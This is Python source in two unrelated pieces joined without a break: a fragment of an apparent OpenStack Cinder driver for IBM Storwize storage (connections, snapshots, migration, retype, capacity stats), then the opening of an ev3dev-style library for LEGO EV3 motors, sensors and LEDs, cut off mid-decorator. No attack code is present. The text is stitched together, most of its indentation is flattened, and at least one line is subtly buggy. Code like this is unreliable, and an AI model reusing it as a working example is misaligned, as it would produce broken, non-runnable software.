preferred_node_entry = io_group_nodes[0]
LOG.warn(_('initialize_connection: Did not find a preferred '
'node for volume %s') % volume_name)
properties = {}
properties['target_discovered'] = False
properties['target_lun'] = lun_id
properties['volume_id'] = volume['id']
if vol_opts['protocol'] == 'iSCSI':
type_str = 'iscsi'
if len(preferred_node_entry['ipv4']):
ipaddr = preferred_node_entry['ipv4'][0]
else:
ipaddr = preferred_node_entry['ipv6'][0]
properties['target_portal'] = '%s:%s' % (ipaddr, '3260')
properties['target_iqn'] = preferred_node_entry['iscsi_name']
if chap_secret:
properties['auth_method'] = 'CHAP'
properties['auth_username'] = connector['initiator']
properties['auth_password'] = chap_secret
else:
type_str = 'fibre_channel'
conn_wwpns = self._helpers.get_conn_fc_wwpns(host_name)
if len(conn_wwpns) == 0:
msg = (_('Could not get FC connection information for the '
'host-volume connection. Is the host configured '
'properly for FC connections?'))
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if not vol_opts['multipath']:
# preferred_node_entry can have a list of WWPNs while only
# one WWPN may be available on the storage host. Here we
# walk through the nodes until we find one that works,
# default to the first WWPN otherwise.
for WWPN in preferred_node_entry['WWPN']:
if WWPN in conn_wwpns:
properties['target_wwn'] = WWPN
break
else:
LOG.warning(_('Unable to find a preferred node match '
'for node %(node)s in the list of '
'available WWPNs on %(host)s. '
'Using first available.') %
{'node': preferred_node,
'host': host_name})
properties['target_wwn'] = conn_wwpns[0]
else:
properties['target_wwn'] = conn_wwpns
i_t_map = self._make_initiator_target_map(connector['wwpns'],
conn_wwpns)
properties['initiator_target_map'] = i_t_map
except Exception:
with excutils.save_and_reraise_exception():
self.terminate_connection(volume, connector)
LOG.error(_('initialize_connection: Failed to collect return '
'properties for volume %(vol)s and connector '
'%(conn)s.\n') % {'vol': volume,
'conn': connector})
LOG.debug(_('leave: initialize_connection:\n volume: %(vol)s\n '
'connector %(conn)s\n properties: %(prop)s')
% {'vol': volume, 'conn': connector, 'prop': properties})
return {'driver_volume_type': type_str, 'data': properties, }
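    # The dict returned above follows the usual Cinder connection-info shape;
    # for iSCSI it looks roughly like this (illustrative values):
    #   {'driver_volume_type': 'iscsi',
    #    'data': {'target_portal': '10.0.0.2:3260',
    #             'target_iqn': 'iqn.1986-03.com.ibm:2145...',
    #             'target_lun': 0,
    #             'target_discovered': False,
    #             'volume_id': '...'}}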
def _make_initiator_target_map(self, initiator_wwpns, target_wwpns):
"""Build a simplistic all-to-all mapping."""
i_t_map = {}
for i_wwpn in initiator_wwpns:
i_t_map[str(i_wwpn)] = []
for t_wwpn in target_wwpns:
i_t_map[i_wwpn].append(t_wwpn)
return i_t_map
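    # Pure illustration of the all-to-all mapping built above:
    #   _make_initiator_target_map(['i1', 'i2'], ['t1', 't2'])
    #   => {'i1': ['t1', 't2'], 'i2': ['t1', 't2']}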
@utils.synchronized('storwize-host', external=True)
def terminate_connection(self, volume, connector, **kwargs):
"""Cleanup after an iSCSI connection has been terminated.
When we clean up a terminated connection between a given connector
and volume, we:
1. Translate the given connector to a host name
2. Remove the volume-to-host mapping if it exists
3. Delete the host if it has no more mappings (hosts are created
automatically by this driver when mappings are created)
"""
LOG.debug(_('enter: terminate_connection: volume %(vol)s with '
'connector %(conn)s') % {'vol': volume, 'conn': connector})
vol_name = volume['name']
if 'host' in connector:
# maybe two hosts on the storage, one is for FC and the other for
# iSCSI, so get host according to protocol
vol_opts = self._get_vdisk_params(volume['volume_type_id'])
connector = connector.copy()
if vol_opts['protocol'] == 'FC':
connector.pop('initiator', None)
elif vol_opts['protocol'] == 'iSCSI':
connector.pop('wwnns', None)
connector.pop('wwpns', None)
host_name = self._helpers.get_host_from_connector(connector)
if host_name is None:
msg = (_('terminate_connection: Failed to get host name from'
' connector.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
# See bug #1244257
host_name = None
info = {}
if 'wwpns' in connector and host_name:
target_wwpns = self._helpers.get_conn_fc_wwpns(host_name)
init_targ_map = self._make_initiator_target_map(connector['wwpns'],
target_wwpns)
info = {'driver_volume_type': 'fibre_channel',
'data': {'initiator_target_map': init_targ_map}}
self._helpers.unmap_vol_from_host(vol_name, host_name)
LOG.debug(_('leave: terminate_connection: volume %(vol)s with '
'connector %(conn)s') % {'vol': volume, 'conn': connector})
return info
def create_volume(self, volume):
opts = self._get_vdisk_params(volume['volume_type_id'])
pool = self.configuration.storwize_svc_volpool_name
return self._helpers.create_vdisk(volume['name'], str(volume['size']),
'gb', pool, opts)
def delete_volume(self, volume):
self._helpers.delete_vdisk(volume['name'], False)
if volume['id'] in self._vdiskcopyops:
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
def create_snapshot(self, snapshot):
ctxt = context.get_admin_context()
try:
source_vol = self.db.volume_get(ctxt, snapshot['volume_id'])
except Exception:
msg = (_('create_snapshot: get source volume failed.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
opts = self._get_vdisk_params(source_vol['volume_type_id'])
self._helpers.create_copy(snapshot['volume_name'], snapshot['name'],
snapshot['volume_id'], self.configuration,
opts, False)
def delete_snapshot(self, snapshot):
self._helpers.delete_vdisk(snapshot['name'], False)
def create_volume_from_snapshot(self, volume, snapshot):
if volume['size'] != snapshot['volume_size']:
msg = (_('create_volume_from_snapshot: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
opts = self._get_vdisk_params(volume['volume_type_id'])
self._helpers.create_copy(snapshot['name'], volume['name'],
snapshot['id'], self.configuration,
opts, True)
def create_cloned_volume(self, tgt_volume, src_volume):
if src_volume['size'] != tgt_volume['size']:
msg = (_('create_cloned_volume: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
opts = self._get_vdisk_params(tgt_volume['volume_type_id'])
self._helpers.create_copy(src_volume['name'], tgt_volume['name'],
src_volume['id'], self.configuration,
opts, True)
def extend_volume(self, volume, new_size):
LOG.debug(_('enter: extend_volume: volume %s') % volume['id'])
ret = self._helpers.ensure_vdisk_no_fc_mappings(volume['name'],
allow_snaps=False)
if not ret:
msg = (_('extend_volume: Extending a volume with snapshots is not '
'supported.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
extend_amt = int(new_size) - volume['size']
self._helpers.extend_vdisk(volume['name'], extend_amt)
LOG.debug(_('leave: extend_volume: volume %s') % volume['id'])
def _add_vdisk_copy_op(self, ctxt, volume, new_op):
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
            curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
            # list.append() returns None, so mutate the list in place and
            # reuse it rather than assigning the return value.
            curr_ops_list.append(new_op)
            new_ops_list = curr_ops_list
else:
new_ops_list = [new_op]
new_ops_str = ';'.join([':'.join(x) for x in new_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
if volume['id'] in self._vdiskcopyops:
self._vdiskcopyops[volume['id']].append(new_op)
else:
self._vdiskcopyops[volume['id']] = [new_op]
# We added the first copy operation, so start the looping call
if len(self._vdiskcopyops) == 1:
self._vdiskcopyops_loop = loopingcall.LoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
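    # The pending copy operations are persisted in the volume's admin
    # metadata as one string of colon-separated (orig_id, new_id) pairs
    # joined by semicolons; e.g. two pending copies might serialize to
    # 'vdiskcopyops' -> '0:1;0:2' (illustrative ids), matching the split
    # logic here and in _rm_vdisk_copy_op.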
def _rm_vdisk_copy_op(self, ctxt, volume, orig_copy_id, new_copy_id):
try:
self._vdiskcopyops[volume['id']].remove((orig_copy_id,
new_copy_id))
if not len(self._vdiskcopyops[volume['id']]):
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
        except KeyError:
msg = (_('_rm_vdisk_copy_op: Volume %s does not have any '
'registered vdisk copy operations.') % volume['id'])
LOG.error(msg)
return
except ValueError:
msg = (_('_rm_vdisk_copy_op: Volume %(vol)s does not have the '
'specified vdisk copy operation: orig=%(orig)s '
'new=%(new)s.')
% {'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
LOG.error(msg)
return
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if not curr_ops:
msg = (_('_rm_vdisk_copy_op: Volume metadata %s does not have any '
'registered vdisk copy operations.') % volume['id'])
LOG.error(msg)
return
curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
try:
curr_ops_list.remove((orig_copy_id, new_copy_id))
except ValueError:
msg = (_('_rm_vdisk_copy_op: Volume %(vol)s metadata does not '
'have the specified vdisk copy operation: orig=%(orig)s '
'new=%(new)s.')
% {'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
LOG.error(msg)
return
if len(curr_ops_list):
new_ops_str = ';'.join([':'.join(x) for x in curr_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
else:
self.db.volume_admin_metadata_delete(ctxt.elevated(), volume['id'],
'vdiskcopyops')
def _check_volume_copy_ops(self):
LOG.debug(_("enter: update volume copy status"))
ctxt = context.get_admin_context()
copy_items = self._vdiskcopyops.items()
for vol_id, copy_ops in copy_items:
try:
volume = self.db.volume_get(ctxt, vol_id)
except Exception:
LOG.warn(_('Volume %s does not exist.'), vol_id)
del self._vdiskcopyops[vol_id]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
continue
for copy_op in copy_ops:
try:
synced = self._helpers.is_vdisk_copy_synced(volume['name'],
copy_op[1])
except Exception:
msg = (_('_check_volume_copy_ops: Volume %(vol)s does not '
'have the specified vdisk copy operation: '
'orig=%(orig)s new=%(new)s.')
% {'vol': volume['id'], 'orig': copy_op[0],
'new': copy_op[1]})
LOG.info(msg)
else:
if synced:
self._helpers.rm_vdisk_copy(volume['name'], copy_op[0])
self._rm_vdisk_copy_op(ctxt, volume, copy_op[0],
copy_op[1])
LOG.debug(_("exit: update volume copy status"))
def migrate_volume(self, ctxt, volume, host):
"""Migrate directly if source and dest are managed by same storage.
We create a new vdisk copy in the desired pool, and add the original
vdisk copy to the admin_metadata of the volume to be deleted. The
deletion will occur using a periodic task once the new copy is synced.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
LOG.debug(_('enter: migrate_volume: id=%(id)s, host=%(host)s') %
{'id': volume['id'], 'host': host['host']})
false_ret = (False, None)
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return false_ret
ctxt = context.get_admin_context()
if volume['volume_type_id'] is not None:
volume_type_id = volume['volume_type_id']
vol_type = volume_types.get_volume_type(ctxt, volume_type_id)
else:
vol_type = None
self._check_volume_copy_ops()
new_op = self._helpers.add_vdisk_copy(volume['name'], dest_pool,
vol_type, self._state,
self.configuration)
self._add_vdisk_copy_op(ctxt, volume, new_op)
LOG.debug(_('leave: migrate_volume: id=%(id)s, host=%(host)s') %
{'id': volume['id'], 'host': host['host']})
return (True, None)
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type.
Returns a boolean indicating whether the retype occurred.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
def retype_iogrp_property(volume, new, old):
if new != old:
self._helpers.change_vdisk_iogrp(volume['name'],
self._state, (new, old))
LOG.debug(_('enter: retype: id=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s') % {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host})
ignore_keys = ['protocol', 'multipath']
no_copy_keys = ['warning', 'autoexpand', 'easytier']
copy_keys = ['rsize', 'grainsize', 'compression']
all_keys = ignore_keys + no_copy_keys + copy_keys
old_opts = self._get_vdisk_params(volume['volume_type_id'])
new_opts = self._get_vdisk_params(new_type['id'],
volume_type=new_type)
vdisk_changes = []
need_copy = False
for key in all_keys:
if old_opts[key] != new_opts[key]:
if key in copy_keys:
need_copy = True
break
elif key in no_copy_keys:
vdisk_changes.append(key)
dest_location = host['capabilities'].get('location_info')
if self._stats['location_info'] != dest_location:
need_copy = True
if need_copy:
self._check_volume_copy_ops()
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return False
retype_iogrp_property(volume, new_opts['iogrp'], old_opts['iogrp'])
try:
new = self._helpers.add_vdisk_copy(volume['name'], dest_pool,
new_type, self._state,
self.configuration)
self._add_vdisk_copy_op(ctxt, volume, new)
except exception.VolumeDriverException:
# roll back changing iogrp property
retype_iogrp_property(volume, old_opts['iogrp'],
new_opts['iogrp'])
                msg = (_('Unable to retype: A copy of volume %s exists. '
                         'Retyping would exceed the limit of 2 copies.') %
                       volume['id'])
raise exception.VolumeDriverException(message=msg)
else:
retype_iogrp_property(volume, new_opts['iogrp'], old_opts['iogrp'])
self._helpers.change_vdisk_options(volume['name'], vdisk_changes,
new_opts, self._state)
        LOG.debug(_('exit: retype: id=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s') % {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host['host']})
return True
def manage_existing(self, volume, ref):
"""Manages an existing vdisk.
Renames the vdisk to match the expected name for the volume.
        Error checking done by manage_existing_get_size is not repeated;
        if we got here, then we have a vdisk that isn't in use (or we don't
        care if it is in use).
"""
vdisk = self._helpers.vdisk_by_uid(ref['vdisk_UID'])
if vdisk is None:
reason = _('No vdisk with the specified vdisk_UID.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
self._helpers.rename_vdisk(vdisk['name'], volume['name'])
def manage_existing_get_size(self, volume, ref):
"""Return size of an existing LV for manage_existing.
existing_ref is a dictionary of the form:
{'vdisk_UID': <uid of disk>}
Optional elements are:
'manage_if_in_use': True/False (default is False)
If set to True, a volume will be managed even if it is currently
attached to a host system.
"""
# Check that the reference is valid
if 'vdisk_UID' not in ref:
reason = _('Reference must contain vdisk_UID element.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
# Check for existence of the vdisk
vdisk = self._helpers.vdisk_by_uid(ref['vdisk_UID'])
if vdisk is None:
reason = _('No vdisk with the specified vdisk_UID.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
# Check if the disk is in use, if we need to.
manage_if_in_use = ref.get('manage_if_in_use', False)
if (not manage_if_in_use and
self._helpers.is_vdisk_in_use(vdisk['name'])):
reason = _('The specified vdisk is mapped to a host.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
return int(math.ceil(float(vdisk['capacity']) / units.GiB))
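    # Illustrative reference for the manage_existing_* calls above (the UID
    # is a placeholder, not a real vdisk):
    #   ref = {'vdisk_UID': '600507680000000000000000000000AB',
    #          'manage_if_in_use': False}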
def get_volume_stats(self, refresh=False):
"""Get volume stats.
        If we haven't gotten stats yet or 'refresh' is True,
        update the stats first.
"""
if not self._stats or refresh:
self._update_volume_stats()
return self._stats
def _update_volume_stats(self):
"""Retrieve stats info from volume group."""
LOG.debug(_("Updating volume stats"))
data = {}
data['vendor_name'] = 'IBM'
data['driver_version'] = self.VERSION
data['storage_protocol'] = list(self._state['enabled_protocols'])
data['total_capacity_gb'] = 0 # To be overwritten
data['free_capacity_gb'] = 0 # To be overwritten
data['reserved_percentage'] = self.configuration.reserved_percentage
data['QoS_support'] = False
pool = self.configuration.storwize_svc_volpool_name
backend_name = self.configuration.safe_get('volume_backend_name')
if not backend_name:
backend_name = '%s_%s' % (self._state['system_name'], pool)
data['volume_backend_name'] = backend_name
attributes = self._helpers.get_pool_attrs(pool)
if not attributes:
LOG.error(_('Could not get pool data from the storage'))
exception_message = (_('_update_volume_stats: '
'Could not get storage pool data'))
raise exception.VolumeBackendAPIException(data=exception_message)
data['total_capacity_gb'] = (float(attributes['capacity']) /
units.GiB)
data['free_capacity_gb'] = (float(attributes['free_capacity']) /
units.GiB)
data['easytier_support'] = attributes['easy_tier'] in ['on', 'auto']
data['compression_support'] = self._state['compression_enabled']
data['location_info'] = ('StorwizeSVCDriver:%(sys_id)s:%(pool)s' %
{'sys_id': self._state['system_id'],
'pool': pool})
self._stats = data
|
|
import os
import glob
import warnings
import logging
import re
import atexit
logger = logging.getLogger(__name__)
@atexit.register
def cleanup():
    # On exit, stop every tacho motor and turn off every LED so the brick is
    # left in a quiet state.
    for path in glob.glob('/sys/class/tacho-motor/motor*/command'):
        with open(path, 'w') as f:
            f.write('stop')
    for path in glob.glob('/sys/class/leds/*/trigger'):
        with open(path, 'w') as f:
            f.write('none')
    for path in glob.glob('/sys/class/leds/*/brightness'):
        with open(path, 'w') as f:
            f.write('0')
class NoSuchSensorError(Exception):
def __init__(self, port, name=None):
self.port = port
self.name = name
def __str__(self):
return "No such sensor port=%d name=%s" % (self.port, self.name)
class NoSuchMotorError(Exception):
def __init__(self, port, _type):
self.port = port
self._type = _type
def __str__(self):
return "No such motor port=%s type=%s" % (self.port, self._type)
class NoSuchLibraryError(Exception):
def __init__(self, lib=""):
self.lib = lib
def __str__(self):
return "No such library %s" % self.lib
class Ev3StringType(object):
@staticmethod
def post_read(value):
return value
@staticmethod
def pre_write(value):
return value
class Ev3IntType(object):
@staticmethod
def post_read(value):
return int(value)
@staticmethod
def pre_write(value):
return str(value)
class Ev3BoolType(object):
@staticmethod
def post_read(value):
return bool(value)
@staticmethod
def pre_write(value):
return '1' if value else '0'
class Ev3OnOffType(object):
@staticmethod
def post_read(value):
        return value == 'on'
@staticmethod
def pre_write(value):
if (value == 'on' or value == 'off'):
return value
else:
return 'on' if bool(value) else 'off'
class create_ev3_property(object):
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, cls):
for name, args in self.kwargs.items():
def ev3_property(name, read_only=False, write_only=False, flush_on_write=False, property_type=Ev3StringType):
def fget(self):
if not write_only:
return property_type.post_read(self.read_value(name))
else:
return None
def fset(self, value):
self.write_value(
name, property_type.pre_write(value), flush_on_write)
return property(fget, None if read_only else fset)
setattr(cls, name, ev3_property(name, **args))
return cls
def get_battery_percentage():
"""
Return an int() of the percentage of battery life remaining
"""
voltage_max = None
voltage_min = None
voltage_now = None
with open('/sys/devices/platform/legoev3-battery/power_supply/legoev3-battery/uevent', 'r') as fh:
for line in fh:
if not voltage_max:
re_voltage_max = re.search(
'POWER_SUPPLY_VOLTAGE_MAX_DESIGN=(\d+)', line)
if re_voltage_max:
voltage_max = int(re_voltage_max.group(1))
continue
if not voltage_min:
re_voltage_min = re.search(
'POWER_SUPPLY_VOLTAGE_MIN_DESIGN=(\d+)', line)
if re_voltage_min:
voltage_min = int(re_voltage_min.group(1))
continue
if not voltage_now:
re_voltage_now = re.search(
'POWER_SUPPLY_VOLTAGE_NOW=(\d+)', line)
                    if re_voltage_now:
                        voltage_now = int(re_voltage_now.group(1))
                        # Check the parsed values rather than the re_voltage_*
                        # match objects, which can hold stale matches from
                        # earlier iterations once a value is already found.
                        if voltage_max and voltage_min and voltage_now:
                            break
if voltage_max and voltage_min and voltage_now:
        # This happens with the EV3 rechargeable battery if it is fully
        # charged.
if voltage_now >= voltage_max:
return 100
# Haven't seen this scenario but it can't hurt to check for it
elif voltage_now <= voltage_min:
return 0
# voltage_now is between the min and max
else:
voltage_max -= voltage_min
voltage_now -= voltage_min
return int(voltage_now / float(voltage_max) * 100)
else:
logger.error('voltage_max %s, voltage_min %s, voltage_now %s' %
(voltage_max, voltage_min, voltage_now))
return 0
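# Worked example of the interpolation above (illustrative microvolt values):
# with voltage_min=6000000, voltage_max=7500000 and voltage_now=6750000,
# the shifted ratio is 750000 / 1500000.0, so the function returns 50.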
class Ev3Dev(object):
def __init__(self):
self.sys_path = ""
def read_value(self, name):
attr_file = os.path.join(self.sys_path, name)
if os.path.isfile(attr_file):
with open(attr_file) as f:
value = f.read().strip()
return value
else:
return None
    def write_value(self, name, value, flush=False):
        attr_file = os.path.join(self.sys_path, name)
        if os.path.isfile(attr_file):
            with open(attr_file, 'w') as f:
                f.write(str(value))
                if flush:
                    f.flush()
@create_ev3_property(
bin_data={'read_only': True},
bin_data_format={'read_only': True},
decimals={'read_only': True},
#mode={ 'read_only': False},
fw_version={'read_only': True},
modes={'read_only': True},
name={'read_only': True},
port_name={'read_only': True},
uevent={'read_only': True},
units={'read_only': True},
value0={'read_only': True, 'property_type': Ev3IntType},
value1={'read_only': True, 'property_type': Ev3IntType},
value2={'read_only': True, 'property_type': Ev3IntType},
value3={'read_only': True, 'property_type': Ev3IntType},
value4={'read_only': True, 'property_type': Ev3IntType},
value5={'read_only': True, 'property_type': Ev3IntType},
value6={'read_only': True, 'property_type': Ev3IntType},
value7={'read_only': True, 'property_type': Ev3IntType}
)
class LegoSensor(Ev3Dev):
def __init__(self, port=-1, name=None):
Ev3Dev.__init__(self)
sensor_existing = False
if (port > 0):
self.port = port
for p in glob.glob('/sys/class/lego-sensor/sensor*/uevent'):
with open(p) as f:
for value in f:
if (value.strip().lower() == ('LEGO_ADDRESS=in' + str(port)).lower()):
self.sys_path = os.path.dirname(p)
sensor_existing = True
break
        if name is not None and port == -1:
for p in glob.glob('/sys/class/lego-sensor/sensor*/uevent'):
with open(p) as f:
port_name = None
for value in f:
if (value.strip().lower().startswith('LEGO_ADDRESS=in'.lower())):
port_name = value.strip()[-1]
if sensor_existing:
break
if (value.strip().lower() == ('LEGO_DRIVER_NAME=' + name).lower()):
self.sys_path = os.path.dirname(p)
sensor_existing = True
if port_name is not None:
break
if sensor_existing:
self.port = int(port_name)
break
if (not sensor_existing):
raise NoSuchSensorError(port, name)
self._mode = self.read_value('mode')
@property
def mode(self):
return self._mode
@mode.setter
def mode(self, value):
if (self._mode != value):
self._mode = value
self.write_value('mode', value)
def mode_force_flush(self, value):
self._mode = value
self.write_value('mode', value)
class Enum(object):
def __init__(self, *args, **kwargs):
for arg in args:
kwargs[arg] = arg
self.enum_dict = kwargs
def __getattr__(self, name):
if (name in self.enum_dict.keys()):
return self.enum_dict[name]
else:
raise NameError("no such item %s" % name)
@create_ev3_property(
commands={'read_only': True},
command={'read_only': True, 'write_only': True},
count_per_rot={'read_only': True, 'property_type': Ev3IntType},
driver_name={'read_only': True},
duty_cycle={'read_only': True, 'property_type': Ev3IntType},
duty_cycle_sp={'read_only': False, 'property_type': Ev3IntType},
encoder_polarity={'read_only': False},
polarity_mode={'read_only': False},
port_name={'read_only': True},
position={'read_only': False, 'property_type': Ev3IntType},
position_sp={'read_only': False, 'property_type': Ev3IntType},
ramp_down_sp={'read_only': False, 'property_type': Ev3IntType},
ramp_up_sp={'read_only': False, 'property_type': Ev3IntType},
speed={'read_only': True, 'property_type': Ev3IntType},
speed_regulation={'read_only': False, 'property_type': Ev3OnOffType},
speed_sp={'read_only': False, 'property_type': Ev3IntType},
state={'read_only': True},
stop_command={'read_only': False},
stop_commands={'read_only': True},
time_sp={'read_only': False, 'property_type': Ev3IntType},
uevent={'read_only': True}
)
class Motor(Ev3Dev):
STOP_MODE = Enum(COAST='coast', BRAKE='brake', HOLD='hold')
POSITION_MODE = Enum(RELATIVE='relative', ABSOLUTE='absolute')
PORT = Enum('A', 'B', 'C', 'D')
def __init__(self, port='', _type=''):
Ev3Dev.__init__(self)
motor_existing = False
searchpath = '/sys/class/tacho-motor/motor*/'
if (port != ''):
self.port = port
for p in glob.glob(searchpath + 'uevent'):
with open(p) as f:
for value in f:
if (value.strip().lower() == ('LEGO_ADDRESS=out' + port).lower()):
self.sys_path = os.path.dirname(p)
motor_existing = True
break
if (_type != '' and port == ''):
for p in glob.glob(searchpath + 'uevent'):
with open(p) as f:
port_name = None
for value in f:
if (value.strip().lower().startswith('LEGO_ADDRESS=out'.lower())):
port_name = value.strip()[-1]
if motor_existing:
break
if (value.strip().lower() == ('LEGO_DRIVER_NAME=' + _type).lower()):
self.sys_path = os.path.dirname(p)
motor_existing = True
if port_name is not None:
break
if motor_existing:
self.port = port_name
break
if (not motor_existing):
raise NoSuchMotorError(port, _type)
def stop(self):
self.write_value('command', 'stop')
def start(self):
self.write_value('command', self.mode)
def reset(self):
self.write_value('command', 'reset')
    # The setup_* functions only write the parameter values; the run_*
    # wrappers call start() afterwards. They are separated so that multiple
    # motors can be started at (nearly) the same time.
def setup_forever(self, speed_sp, **kwargs):
self.mode = 'run-forever'
        for k in kwargs:
            v = kwargs[k]
            if v is not None:
                setattr(self, k, v)
speed_regulation = self.speed_regulation
if (speed_regulation):
self.speed_sp = int(speed_sp)
else:
self.duty_cycle_sp = int(speed_sp)
def run_forever(self, speed_sp, **kwargs):
self.setup_forever(speed_sp, **kwargs)
self.start()
def setup_direct(self, duty_cycle_sp, **kwargs):
self.mode = 'run-forever'
        for k in kwargs:
            v = kwargs[k]
            if v is not None:
                setattr(self, k, v)
self.duty_cycle_sp = int(duty_cycle_sp)
def run_direct(self, duty_cycle_sp, **kwargs):
self.setup_direct(duty_cycle_sp, **kwargs)
self.start()
def setup_time_limited(self, time_sp, speed_sp, **kwargs):
self.mode = 'run-timed'
        for k in kwargs:
            v = kwargs[k]
            if v is not None:
                setattr(self, k, v)
speed_regulation = self.speed_regulation
if (speed_regulation):
self.speed_sp = int(speed_sp)
else:
self.duty_cycle_sp = int(speed_sp)
self.time_sp = int(time_sp)
def run_time_limited(self, time_sp, speed_sp, **kwargs):
self.setup_time_limited(time_sp, speed_sp, **kwargs)
self.start()
def setup_position_limited(self, position_sp, speed_sp, absolute=True, **kwargs):
        if absolute:
self.mode = 'run-to-abs-pos'
else:
self.mode = 'run-to-rel-pos'
kwargs['speed_regulation'] = True
        for k in kwargs:
            v = kwargs[k]
            if v is not None:
                setattr(self, k, v)
self.speed_sp = int(speed_sp)
self.position_sp = int(position_sp)
def run_position_limited(self, position_sp, speed_sp, **kwargs):
self.setup_position_limited(position_sp, speed_sp, **kwargs)
self.start()
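    # Sketch of the two-phase start the setup_*/run_* split enables (the
    # ports are assumptions; adjust to your wiring):
    #   left, right = Motor(port='A'), Motor(port='B')
    #   left.setup_forever(50)
    #   right.setup_forever(50)
    #   left.start()   # both motors begin at (nearly) the same time
    #   right.start()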
def I2CSMBusProxy(cls):
try:
from smbus import SMBus
smbus_proxied_methods = [
m for m in dir(SMBus) if (m.startswith('read') or m.startswith('write'))]
for m in smbus_proxied_methods:
def create_proxied_smb_method(method):
def proxied_smb_method(self, *args, **kwargs):
return getattr(self.b, method)(self.addr, *args, **kwargs)
return proxied_smb_method
setattr(cls, m, create_proxied_smb_method(m))
return cls
except ImportError:
warnings.warn('python-smbus binding not found!')
return cls
@I2CSMBusProxy
class I2CS(object):
def __init__(self, port, addr):
self.port = port
self.i2c_port = port + 2
self.sys_path = '/dev/i2c-%s' % self.i2c_port
if (not os.path.exists(self.sys_path)):
raise NoSuchSensorError(port)
try:
from smbus import SMBus
self.b = SMBus(self.i2c_port)
self.addr = addr
except ImportError:
raise NoSuchLibraryError('smbus')
def read_byte_array(self, reg, _len):
return [self.read_byte_data(reg + r) for r in range(_len)]
def read_byte_array_as_string(self, reg, _len):
return ''.join(chr(r) for r in self.read_byte_array(reg, _len))
class create_i2c_property(object):
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, cls):
for name, reg_address_and_read_only in self.kwargs.items():
def i2c_property(reg, read_only=True):
def fget(self):
return self.read_byte_data(reg)
def fset(self, value):
return self.write_byte_data(reg, value)
return property(fget, None if read_only else fset)
            if isinstance(reg_address_and_read_only, int):
prop = i2c_property(reg_address_and_read_only)
else:
prop = i2c_property(
reg_address_and_read_only[0], **reg_address_and_read_only[1])
setattr(cls, name, prop)
return cls
@create_ev3_property(
brightness={'read_only': False, 'property_type': Ev3IntType},
max_brightness={'read_only': True, 'property_type': Ev3IntType},
trigger={'read_only': False, 'flush_on_write': True},
delay_on={'read_only': False, 'property_type': Ev3IntType},
delay_off={'read_only': False, 'property_type': Ev3IntType}
)
class LEDLight(Ev3Dev):
def __init__(self, light_path):
        super(LEDLight, self).__init__()
self.sys_path = '/sys/class/leds/' + light_path
class LEDSide (object):
def __init__(self, left_or_right):
self.green = LEDLight('ev3-%s1:green:ev3dev' % left_or_right)
self.red = LEDLight('ev3-%s0:red:ev3dev' % left_or_right)
self._color = (0, 0)
@property
def color(self):
"""LED color (RED, GREEN), where RED and GREEN are integers
between 0 and 255."""
return self._color
@color.setter
def color(self, value):
assert len(value) == 2
assert 0 <= value[0] <= self.red.max_brightness
assert 0 <= value[1] <= self.green.max_brightness
self._color = (
self.red.brightness, self.green.brightness) = tuple(value)
def blink(self, color=(0, 0), **kwargs):
if (color != (0, 0)):
self.color = color
for index, light in enumerate((self.red, self.green)):
if (not self._color[index]):
continue
light.trigger = 'timer'
for p, v in kwargs.items():
setattr(light, p, v)
def on(self):
self.green.trigger, self.red.trigger = 'none', 'none'
self.red.brightness, self.green.brightness = self._color
def off(self):
self.green.trigger, self.red.trigger = 'none', 'none'
self.red.brightness, self.green.brightness = 0, 0
class LED(object):
class COLOR:
NONE = (0, 0)
RED = (255, 0)
GREEN = (0, 255)
YELLOW = (25, 255)
ORANGE = (120, 255)
AMBER = (255, 255)
left = LEDSide('left')
right = LEDSide('right')
@create_ev3_property(
tone={'read_only': False},
mode={'read_only': True},
